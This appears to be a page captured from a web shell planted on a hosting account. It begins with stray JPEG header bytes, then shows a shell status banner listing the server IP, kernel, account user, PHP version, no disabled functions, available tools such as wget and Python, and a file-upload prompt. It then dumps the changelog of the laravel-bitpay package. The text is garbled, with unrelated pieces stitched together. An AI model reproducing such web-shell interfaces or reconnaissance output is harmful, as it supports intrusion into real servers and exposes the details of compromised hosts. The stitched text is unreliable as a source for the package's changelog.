����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.118.27.44 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirmacademy.com/vendor/vrajroham/laravel-bitpay/ |
Upload File : |
# Changelog All notable changes to `vrajroham/laravel-bitpay` will be documented in this file --- #### v6.0.0 - 2022-12-18 * Updated BitPay client dependency to v7.1.0 * Bumped minimum PHP version to 7.4 * Implemented the invoice webhook/notification resend action * Isolated implementation of the `Refunds` resource #### v5.3.0 - 2022-06-20 * Fixed issues, updated deps & corrected typos by @alexstewartja in https://github.com/vrajroham/laravel-bitpay/pull/42 #### v5.0.1 - 2021-12-18 * Make newLine() calls compatible with Laravel versions below 8 by @Ririshi in https://github.com/vrajroham/laravel-bitpay/pull/41 #### v5.0.0 - 2021-12-09 * v5 Upgrade by @alexstewartja in https://github.com/vrajroham/laravel-bitpay/pull/38: + Updated BitPay client dependency to v6.0.2111 + Implemented exchange rates (single/pair) + Deprecated constants that already exist in core library - Also added return codes that can be used to verify webhooks for the following resources: + Invoices + Recipients + Payouts + Implemented `Settlements` resource + Implemented `Ledgers` resource + Implemented `Recipients` resource + Implemented `Payouts`/`PayoutBatches` resources + Added support for `payout` facade + Updated UX of API Token generation command + Optimized webhook URL (notificationURL) auto-population + Added v4 -> v5 to migration guide #### v2.0.2 - Fixed **livenet** token `URL` [#14](https://github.com/vrajroham/laravel-bitpay/pull/14) by [@IvanG11](https://github.com/IvanG11)